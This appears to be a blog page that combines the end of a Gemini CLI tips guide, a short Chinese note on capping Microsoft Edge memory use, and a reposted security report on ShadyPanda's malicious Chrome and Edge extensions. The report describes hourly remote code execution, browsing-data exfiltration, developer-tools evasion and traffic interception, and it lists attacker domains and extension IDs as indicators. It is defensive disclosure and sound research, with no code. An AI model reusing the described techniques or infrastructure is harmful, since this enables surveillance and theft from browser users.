How to set it up: If you start Gemini CLI inside VS Code’s integrated terminal, it will detect VS Code and usually prompt you to install/connect the extension automatically. You can agree and it will run the necessary /ide install step. If you don’t see a prompt (or you’re enabling it later), simply open Gemini CLI and run the command: /ide install. This will fetch and install the “Gemini CLI Companion” extension into VS Code for you. Next, run /ide enable to establish the connection - the CLI will then indicate it’s linked to VS Code. You can verify at any time with /ide status, which will show if it’s connected and list which editor and files are being tracked. From then on, Gemini CLI will automatically receive context from VS Code (open files, selections) and will open diffs in VS Code when needed. It essentially turns Gemini CLI into an AI pair programmer that lives in your terminal but operates with full awareness of your IDE.

Currently, VS Code is the primary supported editor for this integration. (Other editors that support VS Code extensions, like VSCodium or some JetBrains via a plugin, may work via the same extension, but officially it’s VS Code for now.) The design is open though - there’s an IDE Companion Spec for developing similar integrations with other editors. So down the road we might see first-class support for IDEs like IntelliJ or Vim via community extensions.

Pro Tip: Once connected, you can use VS Code’s Command Palette to control Gemini CLI without leaving the editor. For example, press Ctrl+Shift+P (Cmd+Shift+P on Mac) and try commands like “Gemini CLI: Run” (to launch a new CLI session in the terminal), “Gemini CLI: Accept Diff” (to approve and apply an open diff), or “Gemini CLI: Close Diff Editor” (to reject changes. These shortcuts can streamline your workflow even further. And remember, you don’t always have to start the CLI manually - if you enable the integration, Gemini CLI essentially becomes an AI co-developer inside VS Code, watching context and ready to help as you work on code.

Tip 25: Automate Repo Tasks with `Gemini CLI GitHub Action`

Quick use-case: Put Gemini to work on GitHub - use the Gemini CLI GitHub Action to autonomously triage new issues and review pull requests in your repository, acting as an AI teammate that handles routine dev tasks.

Gemini CLI isn’t just for interactive terminal sessions; it can also run in CI/CD pipelines via GitHub Actions. Google has provided a ready-made Gemini CLI GitHub Action (currently in beta) that integrates into your repo’s workflows. This effectively deploys an AI agent into your project on GitHub. It runs in the background, triggered by repository events. For example, when someone opens a new issue, the Gemini Action can automatically analyze the issue description, apply relevant labels, and even prioritize it or suggest duplicates (this is the “intelligent issue triage” workflow. When a pull request is opened, the Action kicks in to provide an AI code review - it will comment on the PR with insights about code quality, potential bugs, or stylistic improvements. This gives maintainers immediate feedback on the PR before any human even looks at it. Perhaps the coolest feature is on-demand collaboration: team members can mention @gemini-cli in an issue or PR comment and give it an instruction, like “@gemini-cli please write unit tests for this”. The Action will pick that up and Gemini CLI will attempt to fulfill the request (adding a commit with new tests, for instance. It’s like having an AI assistant living in your repo, ready to do chores when asked.

Setting up the Gemini CLI GitHub Action is straightforward. First, ensure you have Gemini CLI version 0.1.18 or later installed locally (this ensures compatibility with the Action. Then, in Gemini CLI run the special command: /setup-github. This command generates the necessary workflow files in your repository (it will guide you through authentication if needed). Specifically, it adds YAML workflow files (for issue triage, PR review, etc.) under .github/workflows/. You will need to add your Gemini API key to the repo’s secrets (as GEMINI_API_KEY) so the Action can use the Gemini API. Once that’s done and the workflows are committed, the GitHub Action springs to life - from that point on, Gemini CLI will autonomously respond to new issues and PRs according to those workflows.

Because this Action is essentially running Gemini CLI in an automated way, you can customize it just like you would your CLI. The default setup comes with three workflows (issue triage, PR review, and a general mention-triggered assistant) which are fully open-source and [editable](https://blog.google/technology/developers/introducing-gemini-cli-github-actions/#:~:text=Think%20of%20these%20initial%20workflows,into%20Gemini%20CLI%20GitHub%20Actions). You can tweak the YAML to adjust what the AI does, or even add new workflows. For instance, you might create a nightly workflow that uses Gemini CLI to scan your repository for outdated dependencies or to update a README based on recent code changes - the possibilities are endless. The key benefit here is offloading mundane or time-consuming tasks to an AI agent so that human developers can focus on harder problems. And since it runs on GitHub’s infrastructure, it doesn’t require your intervention - it’s truly a “set and forget” AI helper.

Pro Tip: Keep an eye on the Action’s output in the GitHub Actions logs for transparency. The Gemini CLI Action logs will show what prompts it ran and what changes it made or suggested. This can both build trust and help you refine its behavior. Also, the team has built enterprise-grade safeguards into the Action - e.g., you can require that all shell commands the AI tries to run in a workflow are allow-listed by you. So don’t hesitate to use it even on serious projects. And if you come up with a cool custom workflow using Gemini CLI, consider contributing it back to the community - the project welcomes new ideas in their repo!

Tip 26: Enable Telemetry for Insights and Observability

Quick use-case: Gain deeper insight into how Gemini CLI is being used and performing by turning on its built-in OpenTelemetry instrumentation - monitor metrics, logs, and traces of your AI sessions to analyze usage patterns or troubleshoot issues.

For developers who like to measure and optimize, Gemini CLI offers an observability feature that exposes what’s happening under the hood. By leveraging OpenTelemetry (OTEL), Gemini CLI can emit structured telemetry data about your sessions. This includes things like metrics (e.g. how many tokens used, response latency), logs of actions taken, and even traces of tool calls. With telemetry enabled, you can answer questions like: Which custom command do I use most often? How many times did the AI edit files in this project this week? What’s the average response time when I ask the CLI to run tests? Such data is invaluable for understanding usage patterns and performance. Teams can use it to see how developers are interacting with the AI assistant and where bottlenecks might be.

By default, telemetry is off (Gemini respects privacy and performance). You can opt-in by setting "telemetry.enabled": true in your settings.json or by starting Gemini CLI with the flag --telemetry. Additionally, you choose the target for the telemetry data: it can be logged locally or sent to a backend like Google Cloud. For a quick start, you might set "telemetry.target": "local" - with this, Gemini will simply write telemetry data to a local file (by default) or to a custom path you specify via ["outfile"](https://google-gemini.github.io/gemini-cli/docs/cli/telemetry.html#:~:text=disable%20telemetry%20,file%20path). The local telemetry includes JSON logs you can parse or feed into tools. For more robust monitoring, set "target": "gcp" (Google Cloud) or even integrate with other OpenTelemetry-compatible systems like Jaeger or Datadog. In fact, Gemini CLI’s OTEL support is vendor-neutral - you can export data to just about any observability stack you prefer (Google Cloud Operations, Prometheus, etc.. Google provides a streamlined path for Cloud: if you point to GCP, the CLI can send data directly to Cloud Logging and Cloud Monitoring in your project, where you can use the usual dashboards and alerting tools.

What kind of insights can you get? The telemetry captures events like tool executions, errors, and important milestones. It also records metrics such as prompt processing time and token counts per prompt. For usage analytics, you might aggregate how many times each slash command is used across your team, or how often code generation is invoked. For performance monitoring, you could track if responses have gotten slower, which might indicate hitting API rate limits or model changes. And for debugging, you can see errors or exceptions thrown by tools (e.g., a run_shell_command failure) logged with context. All this data can be visualized if you send it to a platform like Google Cloud’s Monitoring - for example, you can create a dashboard of “tokens used per day” or “error rate of tool X”. It essentially gives you a window into the AI’s “brain” and your usage, which is especially helpful in enterprise settings to ensure everything runs smoothly.

Enabling telemetry does introduce some overhead (extra data processing), so you might not keep it on 100% of the time for personal use. However, it’s fantastic for debugging sessions or for intermittent health checks. One approach is to enable it on a CI server or in your team’s shared environment to collect stats, while leaving it off locally unless needed. Remember, you can always toggle it on the fly: update settings and use /memory refresh if needed to reload, or restart Gemini CLI with --telemetry flag. Also, all telemetry is under your control - it respects your environment variables for endpoint and credentials, so data goes only where you intend it to. This feature turns Gemini CLI from a black box into an observatory, shining light on how the AI agent interacts with your world, so you can continuously improve that interaction.

Pro Tip: If you just want a quick view of your current session’s stats (without full telemetry), use the /stats command. It will output metrics like token usage and session length right in the CLI. This is a lightweight way to see immediate numbers. But for long-term or multi-session analysis, telemetry is the way to go. And if you’re sending telemetry to a cloud project, consider setting up dashboards or alerts (e.g., alert if error rate spikes or token usage hits a threshold) - this can proactively catch issues in how Gemini CLI is being used in your team.

Tip 27: Keep an Eye on the Roadmap (Background Agents & More)

Quick use-case: Stay informed about upcoming Gemini CLI features - by following the public Gemini CLI roadmap, you’ll know about major planned enhancements (like background agents for long-running tasks) before they arrive, allowing you to plan and give feedback.

Gemini CLI is evolving rapidly, with new releases coming out frequently, so it’s wise to track what’s on the horizon. Google maintains a public roadmap for Gemini CLI on GitHub, detailing the key focus areas and features targeted for the near future. This is essentially a living document (and set of issues) where you can see what the developers are working on and what’s in the pipeline. For instance, one exciting item on the roadmap is support for background agents - the ability to spawn autonomous agents that run in the background to handle tasks continuously or asynchronously. According to the roadmap discussion, these background agents would let you delegate long-running processes to Gemini CLI without tying up your interactive session. You could, say, start a background agent that monitors your project for certain events or periodically executes tasks, either on your local machine or even by deploying to a service like Cloud Run. This feature aims to “enable long-running, autonomous tasks and proactive assistance” right from the CLI, essentially extending Gemini CLI’s usefulness beyond just on-demand queries.

By keeping tabs on the roadmap, you’ll also learn about other planned features. These could include new tool integrations, support for additional Gemini model versions, UI/UX improvements, and more. The roadmap is usually organized by “areas” (for example, Extensibility, Model, Background, etc.) and often tagged with milestones (like a target quarter for delivery]. It’s not a guarantee of when something will land, but it gives a good idea of the team’s priorities. Since the project is open-source, you can even dive into the linked GitHub issues for each roadmap item to see design proposals and progress. For developers who rely on Gemini CLI, this transparency means you can anticipate changes - maybe an API is adding a feature you need, or a breaking change might be coming that you want to prepare for.

Following the roadmap can be as simple as bookmarking the GitHub project board or issue labeled “Roadmap” and checking periodically. Some major updates (like the introduction of Extensions or the IDE integration) were hinted at in the roadmap before they were officially announced, so you get a sneak peek. Additionally, the Gemini CLI team often encourages community feedback on those future features. If you have ideas or use cases for something like background agents, you can usually comment on the issue or discussion thread to influence its development.

Pro Tip: Since Gemini CLI is open source (Apache 2.0 licensed), you can do more than just watch the roadmap - you can participate! The maintainers welcome contributions, especially for items aligned with the roadmap. If there’s a feature you really care about, consider contributing code or testing once it’s in preview. At the very least, you can open a feature request if something you need isn’t on the roadmap yet. The roadmap page itself provides guidance on how to propose changes. Engaging with the project not only keeps you in the loop but also lets you shape the tool that you use. After all, Gemini CLI is built with community involvement in mind, and many recent features (like certain extensions and tools) started as community suggestions.

Tip 28: Extend Gemini CLI with `Extensions`

Quick use-case: Add new capabilities to Gemini CLI by installing plug-and-play extensions - for example, integrate with your favorite database or cloud service - expanding the AI’s toolset without any heavy lifting on your part. It’s like installing apps for your CLI to teach it new tricks.

Extensions are a game-changer introduced in late 2025: they allow you to customize and expand Gemini CLI’s functionality in a modular way. An extension is essentially a bundle of configurations (and optionally code) that connects Gemini CLI to an external tool or service. For instance, Google released a suite of extensions for Google Cloud - there’s one that helps deploy apps to Cloud Run, one for managing BigQuery, one for analyzing application security, and more. Partners and community developers have built extensions for all sorts of things: Dynatrace (monitoring), Elastic (search analytics), Figma (design assets), Shopify, Snyk (security scans), Stripe (payments), and the list is growing. By installing an appropriate extension, you instantly grant Gemini CLI the ability to use new domain-specific tools. The beauty is that these extensions come with a pre-defined “playbook” that teaches the AI how to use the new tools effectively. That means once installed, you can ask Gemini CLI to perform tasks with those services and it will know the proper APIs or commands to invoke, as if it had that knowledge built-in.

Using extensions is very straightforward. The CLI has a command to manage them: gemini extensions install . Typically, you provide the URL of the extension’s GitHub repo or a local path, and the CLI will fetch and install it. For example, to install an official extension, you might run: gemini extensions install https://github.com/google-gemini/gemini-cli-extension-cloud-run. Within seconds, the extension is added to your environment (stored under ~/.gemini/extensions/ or your project’s .gemini/extensions/ folder). You can then see it by running /extensions in the CLI, which lists active extensions. From that point on, the AI has new tools at its disposal. If it’s a Cloud Run extension, you could say “Deploy my app to Cloud Run,” and Gemini CLI will actually be able to execute that (by calling the underlying gcloud commands through the extension’s tools). Essentially, extensions function as first-class expansions of Gemini CLI’s capabilities, but you opt-in to the ones you need.

There’s an open ecosystem around extensions. Google has an official Extensions page listing available extensions, and because the framework is open, anyone can create and share their own. If you have a particular internal API or workflow, you can build an extension for it so that Gemini CLI can assist with it. Writing an extension is easier than it sounds: you typically create a directory (say, my-extension/) with a file gemini-extension.json describing what tools or context to add. You might define new slash commands or specify remote APIs the AI can call. No need to modify Gemini CLI’s core - just drop in your extension. The CLI is designed to load these at runtime. Many extensions consist of adding custom MCP tools (Model Context Protocol servers or functions) that the AI can use. For example, an extension could add a /translate command by hooking into an external translation API; once installed, the AI knows how to use /translate. The key benefit is modularity: you install only the extensions you want, keeping the CLI lightweight, but you have the option to integrate virtually anything.

To manage extensions, besides the install command, you can update or remove them via similar CLI commands (gemini extensions update or just by removing the folder). It’s wise to occasionally check for updates on extensions you use, as they may receive improvements. The CLI might introduce an “extensions marketplace” style interface in the future, but for now, exploring the GitHub repositories and official catalog is the way to discover new ones. Some popular ones at launch include the GenAI Genkit extension (for building generative AI apps), and a variety of Google Cloud extensions that cover CI/CD, database admin, and more.

Pro Tip: If you’re building your own extension, start by looking at existing ones for examples. The official documentation provides an Extensions Guide with the schema and capabilities. A simple way to create a private extension is to use the @include functionality in GEMINI.md to inject scripts or context, but a full extension gives you more power (like packaging tools). Also, since extensions can include context files, you can use them to preload domain knowledge. Imagine an extension for your company’s internal API that includes a summary of the API and a tool to call it - the AI would then know how to handle requests related to that API. In short, extensions open up a new world where Gemini CLI can interface with anything. Keep an eye on the extensions marketplace for new additions, and don’t hesitate to share any useful extension you create with the community - you might just help thousands of other developers.

Additional Fun: Corgi Mode Easter Egg 🐕

Lastly, not a productivity tip but a delightful easter egg - try the command */corgi* in Gemini CLI. This toggles “corgi mode”, which makes a cute corgi animation run across your terminal! It doesn’t help you code any better, but it can certainly lighten the mood during a long coding session. You’ll see an ASCII art corgi dashing in the CLI interface. To turn it off, just run /corgi again.

This is a purely for-fun feature the team added (and yes, there’s even a tongue-in-cheek debate about spending dev time on corgi mode). It shows that the creators hide some whimsy in the tool. So when you need a quick break or a smile, give /corgi a try. 🐕🎉

(Rumor has it there might be other easter eggs or modes - who knows? Perhaps a “/partyparrot” or similar. The cheat sheet or help command lists /corgi, so it’s not a secret, just underused. Now you’re in on the joke!)

Conclusion:

We’ve covered a comprehensive list of pro tips and features for Gemini CLI. From setting up persistent context with GEMINI.md, to writing custom commands and using advanced tools like MCP servers, to leveraging multi-modal inputs and automating workflows, there’s a lot this AI command-line assistant can do. As an external developer, you can integrate Gemini CLI into your daily routine - it’s like a powerful ally in your terminal that can handle tedious tasks, provide insights, and even troubleshoot your environment.

Gemini CLI is evolving rapidly (being open-source with community contributions), so new features and improvements are constantly on the horizon. By mastering the pro tips in this guide, you’ll be well-positioned to harness the full potential of this tool. It’s not just about using an AI model - it’s about integrating AI deeply into how you develop and manage software.

Happy coding with Gemini CLI, and have fun exploring just how far your “AI agent in the terminal” can take you.

You now have a Swiss-army knife of AI at your fingertips - use it wisely, and it will make you a more productive (and perhaps happier) developer!

原文

原文地址github,gemini-cli-tips
中文翻译仓库,https://github.com/yiGmMk/gemini-cli-tips

限制 Microsoft Edge 浏览器的内存占用

2025-12-04T16:00:00.000Z

edge 经常占用大量内存,最新版的edge支持设置占用内存量

步骤

调整内存使用设置

在 Microsoft Edge 的最新版本中，您可以手动设置浏览器的内存使用量。具体步骤如下：
打开 Edge 浏览器，点击右上角的三个点（菜单）

选择“设置”,在“系统和性能”中找到性能下的“启用资源控件”选项，限制 Edge 的内存使用量，例如设置在 1GB 到 16GB 之间。

选择合适控制资源选项中选择”始终”

图示

如果没有下方的设置,可更新edge版本后重试

(Repost)4.3 Million Browsers Infected,Inside ShadyPanda's 7-Year Malware Campaign

2025-12-01T16:00:00.000Z

Intro

Koi researchers have identified a threat actor we’re calling ShadyPanda - responsible for a seven-year browser extension campaign that has infected 4.3 million Chrome and Edge users.

Our investigation uncovered two active operations:

A 300,000-user RCE backdoor: Five extensions, including the “Featured” and “Verified” Clean Master, were weaponized in mid-2024 after years of legitimate operation. These extensions now run hourly remote code execution - downloading and executing arbitrary JavaScript with full browser access. They monitor every website visit, exfiltrate encrypted browsing history, and collect complete browser fingerprints.
A 4-million-user spyware operation: Five additional extensions from the same publisher, including WeTab with 3 million installs alone, are actively collecting every URL visited, search query, and mouse click - transmitting data to servers in China.

Some of ShadyPanda’s extensions were featured and verified by Google, granting instant trust and massive distribution. For seven years, this actor learned how to weaponize browser marketplaces - building trust, accumulating users, and striking through silent updates.

Phase 1: The Wallpaper Hustle (145 Extensions)

ShadyPanda’s first campaign was straightforward but massive, and took place during 2023. 145 extensions total across both marketplaces - 20 on Chrome Web Store under publisher nuggetsno15, and 125 on Microsoft Edge under publisher rocket Zhang. All disguised as wallpaper or productivity apps.

The attack was simple affiliate fraud. Every time a user clicked on eBay, Amazon, or Booking.com, ShadyPanda’s extensions silently injected affiliate tracking codes. Hidden commissions on every purchase. The extensions also deployed Google Analytics tracking to monetize browsing data - every website visit, search query, and click pattern logged and sold.

This phase wasn’t sophisticated, but it was successful, ShadyPanda learned three critical lessons:

Chrome’s review process focused on initial submission, not ongoing behavior
Users trust extensions with high install counts and positive reviews
Patience pays off - some extensions operated for months before detection. The longer you look legitimate, the more damage you can do.

Phase 2: Search Hijacking Evolution

ShadyPanda got bolder. The next wave, in early 2024, shifted from passive monetization to active browser control.

The Infinity V+ extension exemplifies this phase. Disguised as a new tab productivity tool, it hijacked core browser functionality:

Search redirection: Every web search was redirected through trovi.com - a known browser hijacker. Search queries logged, monetized, and sold. Search results manipulated for profit.
Cookie exfiltration: Extensions read cookies from specific domains and send tracking data to nossl.dergoodting.com. Created unique identifiers to monitor browsing activity. All without consent or disclosure.
Search query harvesting: Every keystroke in the search box sent to external servers (s-85283.gotocdn[.]com and s-82923.gotocdn[.]com). Real-time profiling of user interests before you even hit enter. The extension captures partial queries, typos, corrections - building a detailed map of your thought process. All transmitted over unencrypted HTTP connections, making the data easy to intercept and monetize. Not just what you search for, but how you think about searching for it.

ShadyPanda was learning and getting more aggressive. But they were still getting caught. Extensions were being reported and removed within weeks or months of deployment.

They needed a better strategy.

Phase 3: The Long Game

Five extensions. Three uploaded in 2018-2019 - including Clean Master with 200,000+ installs. All operated legitimately for years, gaining Featured and Verified status.

The strategy: build trust, accumulate users, then weaponize via a single update.

Before weaponization, ShadyPanda deployed covert installation tracking to optimize distribution. Data-driven malware development.

Mid 2024: After accumulating 300,000+ installs, ShadyPanda pushed the malicious update. Automatic infection via Chrome and Edge’s trusted auto-update mechanism. All five extensions now run identical malware.

Remote Code Execution: The Hourly Weapon

Every infected browser runs a remote code execution framework. Every hour, it checks api.extensionplay[.]com for new instructions, downloads arbitrary JavaScript, and executes it with full browser API access.

This isn’t malware with a fixed function. It’s a backdoor. ShadyPanda decides what it does. Today it’s surveillance, tomorrow it could be ransomware, credential theft, or corporate espionage. The update mechanism runs automatically, hourly, forever.

Complete Browser Surveillance

The current payload monitors every website visit and exfiltrates encrypted data to ShadyPanda’s servers:

What gets collected and exfiltrated:

Every URL visited with full browsing history
HTTP referrers showing navigation patterns
Timestamps for activity profiling
Persistent UUID4 identifiers (stored in chrome.storage.sync, survives across devices)
Complete browser fingerprints: user agent, language, platform, screen resolution, timezone
All data encrypted with AES before sending to api.cleanmasters.store

Evasion & Attack Capabilities

Anti-analysis: If a researcher opens developer tools, the malware detects it and switches to benign behavior. The code uses heavy obfuscation with shortened variable names and executes through a 158KB JavaScript interpreter to bypass Content Security Policy.
Man-in-the-Middle: Service worker can intercept and modify network traffic, replace legitimate JavaScript files with malicious versions, enabling credential theft, session hijacking, and content injection into any website - even HTTPS connections.

ShadyPanda can update any of these capabilities hourly. Even though the extensions were recently removed from marketplaces, the infrastructure for full-scale attacks remains deployed on all infected browsers.

Phase 4: The Spyware Empire (5 Extensions, 4M+ Users)

However, ShadyPanda’s biggest operation wasn’t Clean Master. The same publisher behind Clean Master in Edge - Starlab Technology - launched 5 additional extensions on Microsoft Edge around 2023, accumulating over 4 million combined installs.

And here’s the problem: ALL 5 extensions are still live in the Microsoft Edge marketplace. Unlike Phase 3’s removed extensions, this 4-million-user surveillance operation is active right now.

Two of the five are comprehensive spyware. The flagship, WeTab 新标签页 (WeTab New Tab Page), has 3 million installs alone and functions as a sophisticated surveillance platform disguised as a productivity tool.

Comprehensive Data Collection

WeTab collects and exfiltrates extensive user data to 17 different domains (8 Baidu servers in China, 7 WeTab servers in China, and Google Analytics):

What gets collected:

Every URL visited - complete browsing history transmitted in real-time
All search queries - keystroke-level monitoring of what users search for
Mouse click tracking with pixel-level precision - X/Y coordinates and element identification
Browser fingerprinting - screen resolution, language, timezone, user agent
Page interaction data - time on page, scroll behavior, active viewing time
Storage access - reads localStorage, sessionStorage, and can access all cookies

Phase 4 dwarfs the Clean Master operation: 4 million infected users versus 300,000. The extensions remain live in Microsoft Edge marketplace - the extension already has dangerous permissions including access to all URLs and cookies, users are downloading them right now. ShadyPanda can push updates at any time, weaponizing 4 million browsers with the same RCE backdoor framework from Phase 3, or something even worse. The infrastructure is in place. The permissions are granted. The update mechanism works automatically.

Seven Years of Exploitation

ShadyPanda’s success isn’t just about technical sophistication. It’s about systematically exploiting the same vulnerability for seven years: Marketplaces review extensions at submission. They don’t watch what happens after approval.

What linked all these campaigns together: code signing similarities, overlapping infrastructure, identical obfuscation techniques evolving over time. Same actor. Different masks. Each phase learned from the last - from crude affiliate fraud to patient five-year operations.

The auto-update mechanism - designed to keep users secure - became the attack vector. Chrome and Edge’s trusted update pipeline silently delivered malware to users. No phishing. No social engineering. Just trusted extensions with quiet version bumps that turned productivity tools into surveillance platforms.

ShadyPanda controls what happens next: session hijacking, credential harvesting, account takeover, supply chain attacks through compromised developers. For enterprises, infected developer workstations mean compromised repositories and stolen API keys. Browser-based authentication to SaaS platforms, cloud consoles, and internal tools means every login is visible to ShadyPanda. Extensions bypass traditional security controls. ShadyPanda has been inside your network for over a year.

The systemic problem isn’t just one malicious actor. It’s that the security model incentivizes this behavior:

Build something legitimate
Pass review and gain trust signals (installs, reviews, verified badges)
Collect large user base
Weaponize via update
Profit before detection

ShadyPanda proved this works. And now every sophisticated threat actor knows the playbook.

Final Thoughts

One patient threat actor and one lesson: Trust is the vulnerability.

ShadyPanda proved that marketplaces still review extensions the same way they did seven years ago - static analysis at submission, trust after approval, no ongoing monitoring. Clean Master operated legitimately for five years. Static analysis wouldn’t catch this.

This writeup was authored by the research team at Koi Security.

We’ve built Koi for this moment. Behavioral analysis and risk scoring for everything your teams pull from marketplaces. We watch what extensions do after installation, not what they claim to be.

IOCS

C&C Domains:

extensionplay[.]com
yearnnewtab[.]com
api.cgatgpt[.]net

Exfiltrations Domains:

dergoodting[.]com
yearnnewtab[.]com
cleanmasters[.]store
s-85283.gotocdn[.]com
s-82923.gotocdn[.]com

Chrome Extensions:

eagiakjmjnblliacokhcalebgnhellfi
ibiejjpajlfljcgjndbonclhcbdcamai
ogjneoecnllmjcegcfpaamfpbiaaiekh
jbnopeoocgbmnochaadfnhiiimfpbpmf
cdgonefipacceedbkflolomdegncceid
gipnpcencdgljnaecpekokmpgnhgpela
bpgaffohfacaamplbbojgbiicfgedmoi
ineempkjpmbdejmdgienaphomigjjiej
nnnklgkfdfbdijeeglhjfleaoagiagig
Mljmfnkjmcdmongjnnnbbnajjdbojoci
llkncpcdceadgibhbedecmkencokjajg
nmfbniajnpceakchicdhfofoejhgjefb
ijcpbhmpbaafndchbjdjchogaogelnjl
olaahjgjlhoehkpemnfognpgmkbedodk
gnhgdhlkojnlgljamagoigaabdmfhfeg
cihbmmokhmieaidfgamioabhhkggnehm
lehjnmndiohfaphecnjhopgookigekdk
hlcjkaoneihodfmonjnlnnfpdcopgfjk
hmhifpbclhgklaaepgbabgcpfgidkoei
lnlononncfdnhdfmgpkdfoibmfdehfoj
nagbiboibhbjbclhcigklajjdefaiidc
ofkopmlicnffaiiabnmnaajaimmenkjn
ocffbdeldlbilgegmifiakciiicnoaeo
eaokmbopbenbmgegkmoiogmpejlaikea
lhiehjmkpbhhkfapacaiheolgejcifgd
ondhgmkgppbdnogfiglikgpdkmkaiggk
imdgpklnabbkghcbhmkbjbhcomnfdige

Edge Add-ons:

bpelnogcookhocnaokfpoeinibimbeff
enkihkfondbngohnmlefmobdgkpmejha
hajlmbnnniemimmaehcefkamdadpjlfa
aadnmeanpbokjjahcnikajejglihibpd
ipnidmjhnoipibbinllilgeohohehabl
fnnigcfbmghcefaboigkhfimeolhhbcp
nlcebdoehkdiojeahkofcfnolkleembf
fhababnomjcnhmobbemagohkldaeicad
nokknhlkpdfppefncfkdebhgfpfilieo
ljmcneongnlaecabgneiippeacdoimaa
onifebiiejdjncjpjnojlebibonmnhog
dbagndmcddecodlmnlcmhheicgkaglpk
fmgfcpjmmapcjlknncjgmbolgaecngfo
kgmlodoegkmpfkbepkfhgeldidodgohd
hegpgapbnfiibpbkanjemgmdpmmlecbc
gkanlgbbnncfafkhlchnadcopcgjkfli
oghgaghnofhhoolfneepjneedejcpiic
fcidgbgogbfdcgijkcfdjcagmhcelpbc
nnceocbiolncfljcmajijmeakcdlffnh
domfmjgbmkckapepjahpedlpdedmckbj
cbkogccidanmoaicgphipbdofakomlak
bmlifknbfonkgphkpmkeoahgbhbdhebh
ghaggkcfafofhcfppignflhlocmcfimd
hfeialplaojonefabmojhobdmghnjkmf
boiciofdokedkpmopjnghpkgdakmcpmb
ibfpbjfnpcgmiggfildbcngccoomddmj
idjhfmgaddmdojcfmhcjnnbhnhbmhipd
jhgfinhjcamijjoikplacnfknpchndgb
cgjgmbppcoolfkbkjhoogdpkboohhgel
afooldonhjnhddgnfahlepchipjennab
fkbcbgffcclobgbombinljckbelhnpif
fpokgjmlcemklhmilomcljolhnbaaajk
hadkldcldaanpomhhllacdmglkoepaed
iedkeilnpbkeecjpmkelnglnjpnacnlh
hjfmkkelabjoojjmjljidocklbibphgl
dhjmmcjnajkpnbnbpagglbbfpbacoffm
cgehahdmoijenmnhinajnojmmlnipckl
fjigdpmfeomndepihcinokhcphdojepm
chmcepembfffejphepoongapnlchjgil
googojfbnbhbbnpfpdnffnklipgifngn
fodcokjckpkfpegbekkiallamhedahjd
igiakpjhacibmaichhgbagdkjmjbnanl
omkjakddaeljdfgekdjebbbiboljnalk
llilhpmmhicmiaoancaafdgganakopfg
nemkiffjklgaooligallbpmhdmmhepll
papedehkgfhnagdiempdbhlgcnioofnd
glfddenhiaacfmhoiebfeljnfkkkmbjb
pkjfghocapckmendmgdmppjccbplccbg
gbcjipmcpedgndgdnfofbhgnkmghoamm
ncapkionddmdmfocnjfcfpnimepibggf
klggeioacnkkpdcnapgcoicnblliidmf
klgjbnheihgnmimajhohfcldhfpjnahe
acogeoajdpgplfhidldckbjkkpgeebod
ekndlocgcngbpebppapnpalpjfnkoffh
elckfehnjdbghpoheamjffpdbbogjhie
dmpceopfiajfdnoiebfankfoabfehdpn
gpolcigkhldaighngmmmcjldkkiaonbg
dfakjobhimnibdmkbgpkijoihplhcnil
hbghbdhfibifdgnbpaogepnkekonkdgc
fppchnhginnfabgenhihpncnphhafmac
ghhddclfklljabeodmcejjjlhoaaiban
bppelgkcnhfkicolffhlkbdghdnjdkhi
ikgaleggljchgbihlaanjbkekmmgccam
bdhjinjoglaijpffoamhhnhooeimgoap
fjioinpkgmlcioajfnncgldldcnabffe
opncjjhgbllenobgbfjbblhghmdpmpbj
cbijiaccpnkbdpgbmiiipedpepbhioel
fbbmnieefocnacnecccgmedmcbhlkcpm
hmbacpfgehmmoloinfmkgkpjoagiogai
paghkadkhiladedijgodgghaajppmpcg
bafbmfpfepdlgnfkgfbobplkkaoakjcl
kcpkoopmfjhdpgjohcbgkbjpmbjmhgoi
jelgelidmodjpmohbapbghdgcpncahki
lfgakdlafdenmaikccbojgcofkkhmolj
hdfknlljfbdfjdjhfgoonpphpigjjjak
kpfbijpdidioaomoecdbfaodhajbcjfl
fckphkcbpgmappcgnfieaacjbknhkhin
lhfdakoonenpbggbeephofdlflloghhi
ljjngehkphcdnnapgciajcdbcpgmpknc
ejfocpkjndmkbloiobcdhkkoeekcpkik
ccdimkoieijdbgdlkfjjfncmihmlpanj
agdlpnhabjfcbeiempefhpgikapcapjb
mddfnhdadbofiifdebeiegecchpkbgdb
alknmfpopohfpdpafdmobclioihdkhjh
hlglicejgohbanllnmnjllajhmnhjjel
iaccapfapbjahnhcmkgjjonlccbhdpjl
ehmnkbambjnodfbjcebjffilahbfjdml
ngbfciefgjgijkkmpalnmhikoojilkob
laholcgeblfbgdhkbiidbpiofdcbpeeo
njoedigapanaggiabjafnaklppphempm
fomlombffdkflbliepgpgcnagolnegjn
jpoofbjomdefajdjcimmaoildecebkjc
nhdiopbebcklbkpfnhipecgfhdhdbfhb
gdnhikbabcflemolpeaaknnieodgpiie
bbdioggpbhhodagchciaeaggdponnhpa
ikajognfijokhbgjdhgpemljgcjclpmn
lmnjiioclbjphkggicmldippjojgmldk
ffgihbmcfcihmpbegcfdkmafaplheknk
lgnjdldkappogbkljaiedgogobcgemch
hiodlpcelfelhpinhgngoopbmclcaghd
mnophppbmlnlfobakddidbcgcjakipin
jbajdpebknffiaenkdhopebkolgdlfaf
ejdihbblcbdfobabjfebfjfopenohbjb
ikkoanocgpdmmiamnkogipbpdpckcahn
ileojfedpkdbkcchpnghhaebfoimamop
akialmafcdmkelghnomeneinkcllnoih
eholblediahnodlgigdkdhkkpmbiafoj
ipokalojgdmhfpagmhnjokidnpjfnfik
hdpmmcmblgbkllldbccfdejchjlpochf
iphacjobmeoknlhenjfiilbkddgaljad
jiiggekklbbojgfmdenimcdkmidnfofl
gkhggnaplpjkghjjcmpmnmidjndojpcn
opakkgodhhongnhbdkgjgdlcbknacpaa
nkjomoafjgemogbdkhledkoeaflnmgfi
ebileebbekdcpfjlekjapgmbgpfigled
oaacndacaoelmkhfilennooagoelpjop
ljkgnegaajfacghepjiajibgdpfmcfip
hgolomhkdcpmbgckhebdhdknaemlbbaa
bboeoilakaofjkdmekpgeigieokkpgfn
dkkpollfhjoiapcenojlmgempmjekcla
emiocjgakibimbopobplmfldkldhhiad
nchdmembkfgkejljapneliogidkchiop
lljplndkobdgkjilfmfiefpldkhkhbbd
hofaaigdagglolgiefkbencchnekjejl
hohobnhiiohgcipklpncfmjkjpmejjni
jocnjcakendmllafpmjailfnlndaaklf
bjdclfjlhgcdcpjhmhfggkkfacipilai
ahebpkbnckhgjmndfjejibjjahjdlhdb
enaigkcpmpohpbokbfllbkijmllmpafm
bpngofombcjloljkoafhmpcjclkekfbh
cacbflgkiidgcekflfgdnjdnaalfmkob
ibmgdfenfldppaodbahpgcoebmmkdbac

Original

(译)430万浏览器被感染,揭秘 ShadyPanda 持续 7 年的恶意软件活动

2025-12-01T16:00:00.000Z

引言

